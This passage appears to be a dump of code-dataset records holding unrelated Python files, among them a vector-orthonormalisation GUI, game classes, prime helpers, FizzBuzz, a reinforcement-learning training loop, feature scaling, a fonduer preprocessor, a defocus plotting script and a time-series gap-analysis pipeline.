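# rounding to four places as the in-class parser does.
def parse_vectors(line):
    vectors = []
    for chunk in line.strip().rstrip(']').lstrip('[').split(';'):
        comps = chunk.rstrip(']').lstrip('[').split(',')
        vectors.append([round(float(c), 4) for c in comps])
    return vectors

assert parse_vectors('[[1,0,0];[0,1,0]]') == [[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]]
```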
self.stanje_0 == 0:\n self.check.set(\"Izberite datoteko\") \n \n def normiraj(self):\n if self.stanje_0 == 1:\n if self.stanje_1 == 0:\n self.norm.set(\"Preverite, če so vektorji pravokotni\") \n if self.stanje_1 == 1:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n nov_seznam = []\n for i in range(len(seznam)):\n seznam[i] = normiraj(seznam[i])\n nov_seznam.append(seznam[i]) \n self.norm.set(\"Vektorji so normirani\")\n self.warning.set(\"\")\n self.stanje_4 = 1\n if self.stanje_1 == 2:\n self.norm.set(\"Ne moremo tvoriti ortonormirane baze prostora\")\n self.save.set(\"\")\n self.stanje_4 = 2\n if self.stanje_0 == 0:\n self.norm.set(\"Izberite datoteko\")\n \n def shrani(self):\n if self.stanje_0 == 1:\n if self.stanje_4 == 0:\n self.save.set(\"Preverite, če so vektorji ortonormirani\") \n if self.stanje_4 == 1:\n ime = filedialog.asksaveasfilename()\n seznam = []\n if ime == \"\":\n return\n g = open(ime, \"w\", encoding = \"UTF-8\")\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f :\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n nov_seznam = []\n for i in range(len(seznam)):\n seznam[i] = normiraj(seznam[i])\n nov_seznam.append(seznam[i])\n pisi = \"[\"\n for i in range(len(nov_seznam) -1):\n pisi += str(nov_seznam[i]) + \";\"\n pisi += str(nov_seznam[-1]) \n pisi += \"]\"\n g.write(pisi)\n g.close\n self.save.set(\"Shranjeno\")\n if self.stanje_4 == 2:\n self.save.set(\"Vektorji niso ortonormirani\")\n elif self.stanje_0 == 0:\n self.save.set(\"Najprej izberite datoteko in preverite ortogonalnost\") \n\n def pomoc(self):\n okno = Toplevel()\n okno.title(\"Pomoč\")\n besedilo_okno = Message(okno, text =\n\"\"\"V prvi vrstici imate gumb odpri, s klikom nanj se odpre okno, s pomočjo katerega izberete željeno datoteko.\nVsebina datoteke naj bo napisana v obliki seznama seznamov, pri čemer elementi seznama predstavlajo vektorje, npr: \\n\n[[x1,x2,x3,x4,x5];[y1,y2,y3,y4,y5];[z1,z2,z3,z4,z5]] \\n\nS pritiskom na gumb \"Preveri\", preverite, če so vektorji v seznamu med seboj pravkotni.\nV primeru, da so pravokotni, jih lahko s pritiskom na gumb \"Normiraj\" normirate in tako tvorite ortonormirano bazo prostora generiranega s temi vektorji.\nS pritiskom na gumb \"Izpiši\" si seznam vektorjev lahko izpišete, s pritiskom na gumb \"Shrani\" pa shranite ortonormiran sistem v novo datoteko.\n\"\"\")\n besedilo_okno.pack()\n gumb_okno = Button(okno, text = \"Vredu\", command = okno.destroy)\n gumb_okno.pack()\n\n def izpis(self):\n if self.stanje_0 == 1:\n if self.stanje_3 == 0:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = 
int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n izpis = \"Vektorji: \\n \\n\"\n for i in range(len(seznam) -1):\n izpis += str(seznam[i]) + \",\" + \"\\n\"\n izpis += str(seznam[-1]) +\".\"\n self.vect1.set(izpis)\n self.stanje_3 = 1\n elif self.stanje_3 == 1:\n self.vect1.set(\"\")\n self.stanje_3 = 0\n elif self.stanje_0 == 0:\n self.warning.set(\"Izberite datoteko\")\n\n def normirani(self):\n if self.stanje_0 == 1:\n if self.stanje_4 == 1:\n seznam = []\n with open(self.dat, \"r\", encoding = \"UTF-8\") as f:\n for line in f:\n vrstica = line.rstrip(\"]\").lstrip(\"[\")\n vektorji = vrstica.split(\";\")\n for vektor in vektorji:\n sez = vektor.rstrip(\"]\").lstrip(\"[\")\n sez = sez.split(\",\")\n for i in range(len(sez)):\n if float(sez[i]) == int(float(sez[i])):\n sez[i] = int(float(sez[i]))\n else:\n sez[i] = round(float(sez[i]), 4)\n seznam.append(sez)\n nov_seznam = []\n for i in range(len(seznam)):\n seznam[i] = normiraj(seznam[i])\n nov_seznam.append(seznam[i])\n if self.stanje_5 == 0:\n izpis = \"Ortonormirana baza: \\n \\n\"\n for i in range(len(nov_seznam) -1):\n izpis += str(nov_seznam[i]) + \",\" + \"\\n\"\n izpis += str(nov_seznam[-1]) +\".\"\n self.vect2.set(izpis)\n self.stanje_5 = 1\n elif self.stanje_5 == 1:\n self.vect2.set(\"\")\n self.stanje_5 = 0\n if self.stanje_4 == 0:\n self.warning.set(\"Preverite ortonormiranost\")\n if self.stanje_1 == 2:\n self.warning.set(\"Ni mogoče izpisati\")\n elif self.stanje_0 == 0:\n self.warning.set(\"Izberite datoteko\")\n\n def odpri(self):\n self.warn.set(\"\")\n self.check.set(\"\")\n self.norm.set(\"\")\n self.save.set(\"\")\n self.help.set(\"\")\n self.vect1.set(\"\")\n self.vect2.set(\"\")\n self.warning.set(\"\")\n self.stanje_0 = 0\n self.stanje_1 = 0\n self.stanje_2 = 0\n self.stanje_3 = 0\n self.stanje_4 = 0\n self.stanje_5 = 0\n filename = askopenfilename()\n self.dat = filename\n if self.dat != \"\":\n self.stanje_0 = 1\n else:\n self.stanje_0 = 0\n\n# funkcije izven razreda\n\ndef skalarni(v1,v2):\n produkt = 0\n for i, j in zip(v1,v2):\n produkt += i * j\n return produkt\n\ndef isti_prostor(sez):\n dolzina = len(sez[0])\n for i in range(len(sez)):\n if len(sez[i]) != dolzina:\n return False\n return True\n\ndef nicelni(sez):\n for i in range(len(sez)):\n if sez[i] == [0 for j in range(len(sez[i]))]:\n return True\n return False\n\ndef normiraj(v1):\n norma =(skalarni(v1,v1))**(1/2)\n for i in range(len(v1)):\n if float(v1[i]/norma) == int(float(v1[i]/norma)):\n v1[i] = int(float(v1[i]/norma))\n else:\n v1[i] = round(float(v1[i]/norma), 4)\n return v1 \n\ndef pravokotni(sez):\n vsota = 0\n if isti_prostor(sez):\n if nicelni(sez):\n return \"nicla\"\n else:\n for indeks1 in range(len(sez) - 1):\n for indeks2 in range(indeks1 + 1, len(sez)):\n vsota += skalarni(sez[indeks1],sez[indeks2])\n if vsota == 0:\n return True\n else:\n return False\n else:\n return \"komponente\"\n\nroot = Tk()\n\nroot.title(\"Vektorji\")\n\naplikacija = Vektorji(root)\n\nroot.mainloop()\n","sub_path":"vektorji.py","file_name":"vektorji.py","file_ext":"py","file_size_in_byte":15045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"350641620","text":"import os\nimport json\nimport pystache\nimport pkg_resources\n\ndef build_screenplay(actions, root_output_dir, initial_basket_position, episode_number):\n actions_string = json.dumps(actions);\n \n resource_package = __name__\n templates_path = '/'.join(('templates', 'actions.moustache.js'))\n template = 
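Worth noting: `pravokotni()` above sums every pairwise dot product and compares the total to zero, so positive and negative products can cancel and mask a non-orthogonal pair; testing each pair separately avoids that:

```python
# Check each pair of vectors individually instead of summing all dot
# products, so cancelling terms cannot hide a non-orthogonal pair.
def pairwise_orthogonal(vectors):
    n = len(vectors)
    return all(
        sum(a * b for a, b in zip(vectors[i], vectors[j])) == 0
        for i in range(n - 1) for j in range(i + 1, n))

assert pairwise_orthogonal([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
assert not pairwise_orthogonal([[1, 1, 0], [1, 0, 0]])
```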
pkg_resources.resource_string(resource_package, templates_path)\n \n output_dir = '{}/screenplays'.format(root_output_dir)\n os.makedirs(output_dir, exist_ok=True)\n result_file = open('{}/episode-{}-actions.js'.format(output_dir, episode_number), 'w')\n result_file.write(pystache.render(template, { 'json': actions_string, 'initialBasketPosition': initial_basket_position }))\n result_file.close()","sub_path":"ballistic/ballistic/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"616850606","text":"# coding: utf-8\n\nfrom element_mobile_tireur import *\nfrom personne import *\n\n\nclass Soldat(Personne, ElementMobileTireur):\n def __init__(self, type_pers, carte: Carte, x_sur_carte: int, y_sur_carte: int, objectif: (int, int) = None,\n orientation=0, alea=0):\n ElementMobileTireur.__init__(self, type_pers, carte, x_sur_carte, y_sur_carte, Tireur(type_pers),\n True, objectif, orientation, alea)\n Personne.__init__(self, type_pers, carte, x_sur_carte, y_sur_carte, objectif, orientation, alea)\n\n def new_objectif(self, x_carte, y_carte, i_pos: int = None, j_pos: int = None, i_objectif: int = None,\n j_objectif: int = None, modification_chemin_seulement=False, alea=0):\n self.immobile = False\n self.annule_cible()\n self.niveau_d_intelligence_actuel = 0\n Personne.new_objectif(self, x_carte, y_carte, i_pos, j_pos, i_objectif, j_objectif,\n modification_chemin_seulement, alea=alea)\n\n def new_cible_obligatoire(self, cible: Element):\n self.cible = cible\n self.niveau_d_intelligence_actuel = 0\n\n def stop(self):\n Personne.stop(self)\n self.immobile = False\n self.niveau_d_intelligence_actuel = self.niveau_d_intelligence\n self.cible = None\n\n def immobilise(self):\n self.stop()\n self.immobile = True\n\n def new_choc(self, nb_chocs_max=NB_CHOC_AVANT_ABANDON_OBJECTIF):\n if self.cible is not None:\n nb_chocs_max = int(nb_chocs_max * COEF_NB_CHOC_AVANT_ABANDON_OBJECTIF_CIBLE_SOLDAT)\n if Personne.new_choc(self, nb_chocs_max):\n self.cible = None\n return True\n return False\n\n def update_tireur(self):\n if self.objectif is None and self.cible is None:\n self.niveau_d_intelligence_actuel = self.niveau_d_intelligence\n ElementMobileTireur.update_tireur(self)\n\n def affiche_objectif(self, screen: pygame.Surface):\n if self.cible is not None:\n x_cible, y_cible = 0, 0\n if isinstance(self.cible, Batiment):\n x_cible, y_cible = self.carte.ij_case_to_centre_xy_relatif(self.cible.i, self.cible.j)\n elif isinstance(self.cible, ElementMobile):\n x_cible, y_cible = self.carte.xy_carte_to_xy_relatif(self.cible.x_sur_carte, self.cible.y_sur_carte)\n\n x_pos, y_pos = self.carte.xy_carte_to_xy_relatif(self.x_sur_carte, self.y_sur_carte)\n pygame.gfxdraw.line(screen, x_pos, y_pos, x_cible, y_cible, COULEUR_ELEMENT_SELECTION)\n pygame.draw.circle(screen, COULEUR_ELEMENT_SELECTION, (x_cible, y_cible), 2)\n else:\n Personne.affiche_objectif(self, screen)\n","sub_path":"soldat.py","file_name":"soldat.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357647081","text":"from Components.Botao import Botao\nfrom Defaults import *\n\n\ndef Switch(posX, posY, opcoes, eventos, selecionado):\n\n\n tam = [resolucao[0] * 0.20, resolucao[1] * 0.027 + fonte.size(opcoes[0])[1]]\n rect = [posX - tam[0] / 2, posY - tam[1] / 2, tam[0], tam[1]]\n\n txt = fonte.render(str(opcoes[selecionado]), True, bg)\n 
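`build_screenplay()` above renders a Moustache template with `pystache.render`; a minimal call with an illustrative template string (the real template lives in `templates/actions.moustache.js`):

```python
import pystache

# Minimal pystache render; template text here is illustrative only.
template = "const actions = {{json}}; // start at {{initialBasketPosition}}"
out = pystache.render(template, {'json': '[1, 2]', 'initialBasketPosition': 3})
assert out == "const actions = [1, 2]; // start at 3"
```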
posTxt = posX - txt.get_size()[0] / 2, posY - txt.get_size()[1] / 2\n\n mais = fonteArr.render(\">>\", True, bg)\n menos = fonteArr.render(\"<<\", True, bg)\n\n centros = [\n [mais.get_size()[0] / 2, mais.get_size()[1] / 2],\n [menos.get_size()[0] / 2, menos.get_size()[1] / 2]\n ]\n\n posMais = (posX + rect[3] * 1.7) - centros[0][0], posY - centros[0][1]\n posMenos = (posX - rect[3] * 1.7) - centros[1][0], posY - centros[1][1]\n\n\n container = engine.draw.rect(tela, branco, rect)\n engine.draw.rect(tela, branco, container, 3)\n\n mPos = engine.mouse.get_pos()\n\n\n if container.collidepoint(mPos):\n rect[0] -= (rect[2] * 0.2) / 2\n rect[2] *= 1.2\n container = engine.draw.rect(tela, branco, rect)\n engine.draw.rect(tela, branco, container, 3)\n\n\n mais = tela.blit(mais, posMais)\n menos = tela.blit(menos, posMenos)\n\n tela.blit(txt, posTxt)\n\n\n if mais.collidepoint(mPos):\n if click(eventos):\n if selecionado +1 < len(opcoes):\n selecionado += 1\n else:\n selecionado = 0\n\n if menos.collidepoint(mPos):\n if click(eventos):\n if selecionado -1 > -1:\n selecionado -= 1\n else:\n selecionado = len(opcoes) -1\n \n\n return selecionado\n\ndef click(evento):\n if evento != None and evento.type == engine.MOUSEBUTTONDOWN:\n return True\n","sub_path":"Components/Switch.py","file_name":"Switch.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459393314","text":"def GetPrimeList():\n primeList = []\n f = open('PrimeBelowMillion.txt')\n while True:\n line = f.readline()\n if not line: break\n primeList.append(int(line))\n f.close()\n return primeList\n\nprimeList = GetPrimeList()\n\ndef LargePrimeListGenerator(num):\n for i in range(1000000, num+1):\n limit = int(i**0.5)\n check=True\n for j in primeList:\n if j>limit: break\n elif i%j==0:\n check=False\n break\n if check:\n primeList.append(i)\n return primeList\n\ndef PrimeDetector(num):\n limit = num ** 0.5\n for i in primeList:\n if i>limit: return True\n elif num%i==0: return False\n return True\n\ndef PandigitalCheck(string):\n # 1. check 0\n if '0' in string: return False\n\n # 2. check number overflow\n digit = len(string)\n num_list = list(range(1, digit + 1))\n for i in string:\n if not (int(i) in num_list): return False\n\n # 3. 
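`PrimeDetector()` above trial-divides only by cached primes up to sqrt(n); the same idea standalone. Note the cache must extend at least to sqrt(n) for the answer to be trustworthy:

```python
# Trial division against a cached prime list, as in PrimeDetector():
# only primes up to sqrt(n) need checking.
def is_prime(n, primes):
    if n < 2:
        return False
    limit = n ** 0.5
    for p in primes:
        if p > limit:
            return True
        if n % p == 0:
            return False
    return True                          # cache exhausted past sqrt(n)

small_primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31]
assert is_prime(997, small_primes)
assert not is_prime(1001, small_primes)  # 7 * 11 * 13
```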
check overlapped number\n for i in range(len(string)):\n for j in range(i,len(string)):\n if (i!=j) & (string[i] == string[j]):\n return False\n return True","sub_path":"basicFunctions.py","file_name":"basicFunctions.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177096985","text":"#FizzBuzz challenge\n#Write a program that prints the numbers from 1 to 100.\n#But for multiples of three print \"Fizz\" instead of the number\n#and for the multiples of five print \"Buzz\"\n\nfor i in range(1, 101):\n if i%3 == 0:\n if(i%5 == 0):\n print(\"FizzBuzz\")\n continue\n print(\"Fizz\")\n continue\n elif i%5 == 0:\n print(\"Buzz\")\n continue\n print(i)\n","sub_path":"FizzBuzz.py","file_name":"FizzBuzz.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"629425248","text":"# Train agent for the number of episodes and in the mode specified by the user.\n\nimport pickle as cpickle\nimport agent as Agent\nfrom utils import print_summary\n\nNUM_BATCH = 1000\nNUM_EPISODES = 100\nTEST_FREQ = 2\n\ndef run_HAC(FLAGS,env,agent):\n\n # Print task summary\n print_summary(FLAGS,env)\n \n # Determine training mode. If not testing and not solely training, interleave training and testing to track progress\n mix_train_test = False\n if not FLAGS.test and not FLAGS.train_only:\n mix_train_test = True\n \n for batch in range(NUM_BATCH):\n \n # Evaluate policy every TEST_FREQ batches if interleaving training and testing\n if mix_train_test and batch % TEST_FREQ == 0:\n print(\"\\n--- TESTING ---\")\n agent.FLAGS.test = True\n \n # Reset successful episode counter\n successful_episodes = 0\n\n for episode in range(NUM_EPISODES):\n \n print(\"\\nBatch %d, Episode %d\" % (batch, episode))\n success = agent.train(env, episode)\n\n if success:\n print(\"Batch %d, Episode %d End Goal Achieved\\n\" % (batch, episode))\n \n # Increment successful episode counter if applicable\n if mix_train_test and batch % TEST_FREQ == 0:\n successful_episodes += 1 \n\n # Save agent\n agent.save_model(episode)\n \n # Finish evaluating policy if tested prior batch\n if mix_train_test and batch % TEST_FREQ == 0:\n\n # Log performance\n success_rate = successful_episodes / NUM_EPISODES * 100\n print(\"\\nTesting Success Rate %.2f%%\" % success_rate)\n agent.log_performance(success_rate)\n agent.FLAGS.test = False\n\n print(\"\\n--- END TESTING ---\\n\")\n\n \n\n \n \n\n \n","sub_path":"run_HAC.py","file_name":"run_HAC.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222847830","text":"import math\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\n\n# Import\ndf = pd.read_csv(\"./data/data.csv\")\n\n# Save these here as they go away when we scale with preprocessing\nX_columns = df.columns[:-1]\n\n# Drop Y values\nX_df = df.drop(labels=\"Y\", axis=\"columns\")\n\n# See docs here: https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.scale.html#sklearn.preprocessing.scale\n#\n# This scales such that the mean of each feature is 0.\nscaled = preprocessing.scale(X_df, with_std=False) # returns a nparray\nzero_mean_scaled_df = pd.DataFrame(data=scaled, columns=X_columns)\n\n# FOR THE MARKER\n#\n# HA! If I set 'with_std=True' in the preprocessing.scale, the transformed\n# dataset is exactly what I need. 
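`PandigitalCheck()` above tests for zeros, out-of-range digits and duplicates in three separate passes; a set comparison covers all three at once:

```python
# A string is 1..n pandigital iff its digits are exactly {'1', ..., str(n)}
# with no repeats -- one set equality plus a length check.
def is_pandigital(s):
    return set(s) == set('123456789'[:len(s)]) and len(set(s)) == len(s)

assert is_pandigital('2143')
assert not is_pandigital('1223')   # duplicate digit
assert not is_pandigital('105')    # contains 0
```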
\n#\n# I realised this AFTER implementing all of below so I'm going to \n# keep this code in here just so you know that I know what's going on.\n\n# Let's do some manual work for this next part\nsum_of_squares_scaled = []\nfor column_name in zero_mean_scaled_df:\n column = zero_mean_scaled_df[column_name].tolist()\n n = len(column)\n\n sum_of_squares = 0\n for observation in column:\n sum_of_squares += (observation * observation)\n \n scale_factor = math.sqrt(n / sum_of_squares)\n scaled = []\n for observation in column:\n scaled.append(observation * scale_factor)\n\n sum_of_squares_scaled.append(scaled)\n \n# convert to nparray - need to transpose\nnp_matrix = np.array(sum_of_squares_scaled).T\n\n# convert to dataframe\nfinal_scaled_df = pd.DataFrame(data=np_matrix, columns=X_columns)\n# Add \"Y\" back on\nfinal_scaled_df[\"Y\"] = df[\"Y\"]\n# print(final_scaled_df.head())\n\n# save to csv for later\nfinal_scaled_df.to_csv(\"./data/transformed_data.csv\", index=False)\n\n# Now for the question, print out the sum of squares\nprint(\"Sum of squares for each transformed feature:\")\nfor column_name in final_scaled_df:\n if column_name == \"Y\":\n continue\n \n column = final_scaled_df[column_name].tolist()\n\n sum_of_squares = 0\n for observation in column:\n sum_of_squares += (observation * observation)\n\n print(f\"{column_name}: {sum_of_squares}\")\n\n","sub_path":"python/scripts/q2b.py","file_name":"q2b.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360142026","text":"import codecs\n\nfrom fonduer.parser.preprocessors.doc_preprocessor import DocPreprocessor\nfrom fonduer.parser.preprocessors.text_doc_preprocessor import TextDocPreprocessor\n\n\nclass CSVPathsPreprocessor(DocPreprocessor):\n \"\"\"This `DocumentPreprocessor` treats inputs file as index of paths to\n actual documents; each line in the input file contains a path to a document.\n\n **Defaults and Customization:**\n\n * The input file is treated as a simple text file having one path per file.\n However, if the input is a CSV file, a pair of ``column`` and ``delim``\n parameters may be used to retrieve the desired value as reference path.\n\n * The referenced documents are treated as text document and hence parsed\n using ``TextDocPreprocessor``. However, if the referenced files are\n complex, an advanced parser may be used by specifying ``parser_factory``\n parameter to constructor.\n \"\"\"\n\n def __init__(\n self,\n path,\n parser_factory=TextDocPreprocessor,\n column=None,\n delim=\",\",\n *args,\n **kwargs\n ):\n \"\"\"\n :param path: input file having paths\n :param parser_factory: The parser class to be used to parse the\n referenced files. default = TextDocPreprocessor\n :param column: index of the column which references path.\n default=None, which implies that each line has only one column\n :param delim: delimiter to be used to separate columns when file has\n more than one column. It is active only when\n ``column is not None``. 
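As the "FOR THE MARKER" note above observes, scaling each zero-mean column by sqrt(n / sum(x^2)) is exactly standardisation, because the ddof=0 standard deviation of zero-mean data is sqrt(sum(x^2) / n). A quick numerical confirmation:

```python
import numpy as np
from sklearn import preprocessing

rng = np.random.default_rng(0)
X = rng.normal(size=(50, 3))

z = preprocessing.scale(X, with_std=True)          # one-step standardise
manual = preprocessing.scale(X, with_std=False)    # zero-mean only...
manual *= np.sqrt(len(X) / (manual ** 2).sum(axis=0))  # ...then rescale

assert np.allclose(z, manual)
assert np.allclose((z ** 2).sum(axis=0), len(X))   # sum of squares == n
```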
default=','\n \"\"\"\n super(CSVPathsPreprocessor, self).__init__(path, *args, **kwargs)\n self.column = column\n self.delim = delim\n self.parser = parser_factory(path)\n\n def _get_files(self, path):\n with codecs.open(path, encoding=self.encoding) as lines:\n for doc_path in lines:\n if self.column is not None:\n # if column is set, retrieve specific column from CSV record\n doc_path = doc_path.split(self.delim)[self.column]\n yield doc_path.strip()\n\n def parse_file(self, fp, file_name):\n return self.parser.parse_file(fp, file_name)\n","sub_path":"fonduer/parser/preprocessors/csv_paths_preprocessor.py","file_name":"csv_paths_preprocessor.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"257148841","text":"#!/bin/python2.7\n#(C)Ian Outhwaite, Long Lab, MSKCC 2019\n\n#for a CtfRefine \"particles_ctf_refine.star\" file: plots number of particles per micrograph versus standard deviation of defocus values, per micrograph\n#Particle defocus is defined in this script as ( ( _rlnDefocusU + _rlnDefocusV ) / 2 )\n\nimport sys, os\nimport string\nimport random\nimport numpy as np\nimport matplotlib\nfrom scipy import stats\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot as plt\n\nDU = '_rlnDefocusU'\nDV = '_rlnDefocusV'\nmic_name = '_rlnMicrographName'\nattributes = [DU,DV,mic_name]\n\n#gets the header of a star file, returns the columns in the file that the attributes fall into in dictionary form\ndef getHeader(lines):\n\trestoffile = []\n\theader = []\n\tinUnderscores = 0\n\ti = 0\n\twhile i= outlier_cutoff)\n \n # Using map created above, what is the smallest outlier?\n lower_cutoff = np.min(np.asarray(per[target]['gap_sizes'])[cutoff_map])\n \n # This is done to quickly mark gaps bigger than cutoff with zero and\n # other with NaN. 
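The gap chart above marks unusable rows with 0 and everything else with NaN so matplotlib draws only the bad stretches, with `functools.partial` baking the threshold into the mapper. A standalone sketch:

```python
from functools import partial
import numpy as np

# 0 where a gap exceeds the threshold, NaN elsewhere (NaNs are not drawn).
def _cutoff(x, lower_cutoff=0):
    return 0 if x >= lower_cutoff else np.nan

mark = partial(_cutoff, lower_cutoff=5)
marks = list(map(mark, [1, 7, 3, 9]))
assert marks[1] == 0 and marks[3] == 0
assert np.isnan(marks[0]) and np.isnan(marks[2])
```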
This makes a good chart.\n from functools import partial\n \n def _cutoff(x, lower_cutoff=0):\n if x >= lower_cutoff:\n return 0\n else:\n return np.nan\n \n _cutoff_par = partial(_cutoff, lower_cutoff=lower_cutoff)\n mapped_outliers = list(map(_cutoff_par, m[target]))\n \n # plt.scatter(df[index], df[target], s=1, c='black', label='data')\n # plt.plot(df[index], mapped_outliers, c='red', label='Unusuable range') \n # # has to be plot to avoid index\n # # discontinuities\n \n # plt.grid()\n # plt.legend()\n # plt.title('Useful range analysis')\n # plt.xlabel(f'{index}')\n # plt.ylabel(f'{target}')\n # plt.show()\n #%%\n \n ## Automatic proposal of useful area, part 2\n \n # Simply finds the biggest area with acceptable gaps\n \n # TODO - check if the algorithm will detect a stride at the end of the dataset\n # because I have a feeling it won't!\n \n strides = []\n \n s_start = -1\n s_stop = -1\n \n for i in range(len(df)):\n if mapped_outliers[i] != 0 and s_start == -1:\n s_start = i\n elif mapped_outliers[i] == 0 and s_start != -1:\n s_stop = i\n strides.append([s_start, s_stop, s_stop - s_start ])\n \n s_start = -1\n s_stop = -1\n \n strides = np.asarray(strides)\n strides = strides[strides[:,2].argsort()][::-1] # sort by length [2] \n # and reverse\n # print(f'''Proposed range to use is row {strides[0,0]} to row {strides[0,1]}\n # for total of {strides[0,0]} rows\n # ''')\n # print(f'All found strides are: [start, stop, length]')\n # print(strides)\n \n s_start = strides[0,0]\n s_stop = strides[0,1]\n #%%\n \n ## cut the dataframe for the selected stride, redo the stats\n # From now on dfs is used (dataframe stride)\n margin_percent = 1 # since the edges can be a bit unpredictable, margin is\n # removed\n \n s_start = s_start + int((s_stop - s_start) * 0.01*margin_percent)\n s_stop = s_stop - int((s_stop - s_start) * 0.01*margin_percent)\n dfs = df.iloc[s_start:s_stop] # dfs = DataFrameStride\n s, m, per = stats(dfs)\n \n #%%\n \n ## Removing columns that contain big gaps\n \n from functools import partial\n \n def _cutoff_inv(x, lower_cutoff=0):\n if x >= lower_cutoff:\n return 1\n else:\n return 0\n \n _cutoff_par = partial(_cutoff_inv, lower_cutoff=lower_cutoff)\n \n killed_cols = []\n \n for column in list(dfs):\n mapped_outliers = list(map(_cutoff_par, m[column]))\n offender_count = np.sum(mapped_outliers)\n if offender_count > 0:\n dfs = dfs.drop(columns = [column])\n killed_cols.append([column, 100*offender_count/len(dfs)])\n \n killed_cols = pd.DataFrame(killed_cols, columns=['Name','Percent offending'])\n #print('Removed following columns due to outlier gap (showing under 15% only):')\n #print(killed_cols.sort_values(by='Percent offending')[killed_cols['Percent offending'] < 15])\n \n #%%\n \n ## Checking if first derivative of index is stable.\n \n index_dr = np.diff(dfs[index])\n \n index_mean = np.mean(index_dr)\n index_std = np.std(index_dr)\n index_maxgap = np.max(index_dr)\n deviation = np.abs(index_dr - index_mean)/index_std\n \n #print(f'Maximum distance from mean is {np.max(deviation):.1f} standard deviations')\n #print(f'If this value is above 6, there may be too high sampling frequency variation')\n \n #%%\n \n ## Counting zeros in the first derivative to see if it should be ffilled\n ## or linearly interpolated\n \n ## NOTE: Actual filling will not happen here, but AFTER the data split\n \n fill_method = {}\n \n for attribute in list(dfs):\n \n dropna_diff = np.diff(dfs[attribute].dropna())\n zeros_p = np.count_nonzero(dropna_diff == 0) / len(dropna_diff)\n \n if 
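The stride scan above never closes a run that reaches the end of the data, which is the script's own TODO; flushing the open run after the loop fixes it. A sketch over the same 0/NaN flags:

```python
import numpy as np

# Longest run of usable rows; `flags` is 0 where a gap is too big and NaN
# where the row is usable, as in the mapped_outliers array above.
def longest_stride(flags):
    strides, start = [], -1
    for i, v in enumerate(flags):
        if v != 0 and start == -1:        # NaN != 0, so usable rows open a run
            start = i
        elif v == 0 and start != -1:
            strides.append((start, i))
            start = -1
    if start != -1:                       # flush a run touching the end
        strides.append((start, len(flags)))
    return max(strides, key=lambda s: s[1] - s[0])

flags = [0, np.nan, np.nan, 0, np.nan, np.nan, np.nan]
assert longest_stride(flags) == (4, 7)
```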
zeros_p > 0.9: # Threshold to check?\n fill_method[attribute] = 'ffill'\n else:\n fill_method[attribute] = 'linterp'\n \n \n #%%\n \n #%% \n \n ## Gap filling - but only forward filling. Linear interpolation is done later\n \n for attribute in list(dfs):\n if fill_method[attribute] == 'ffill':\n dfs[attribute] = dfs[attribute].ffill().rolling(5, center=True).mean().ffill().bfill()\n \n #%%\n \n \n \n #%%\n \n ## DATA SPLIT\n \n #split = 0.6 #portion of data available\n future = 0.15 #section after available, for testing\n \n X = dfs.drop(target, axis=1)\n y = dfs[target].to_frame()\n \n splitpoint = int(len(dfs)*split)\n futurepoint = int(len(dfs)*(split+future))\n \n X_train = X[:splitpoint]\n y_train = y[:splitpoint]\n X_test = X[splitpoint:futurepoint]\n y_test = y[splitpoint:futurepoint]\n \n \n #%%\n \n ## Linear interpolation after split, so the future does not leak.\n \n \n for attribute in list(X_train):\n if fill_method[attribute] == 'linterp':\n X_train = X_train.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n for attribute in list(y_train):\n if fill_method[attribute] == 'linterp':\n y_train = y_train.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n for attribute in list(X_test):\n if fill_method[attribute] == 'linterp':\n X_test = X_test.interpolate().ffill().bfill().rolling(5, center=True).mean().ffill().bfill()\n \n for 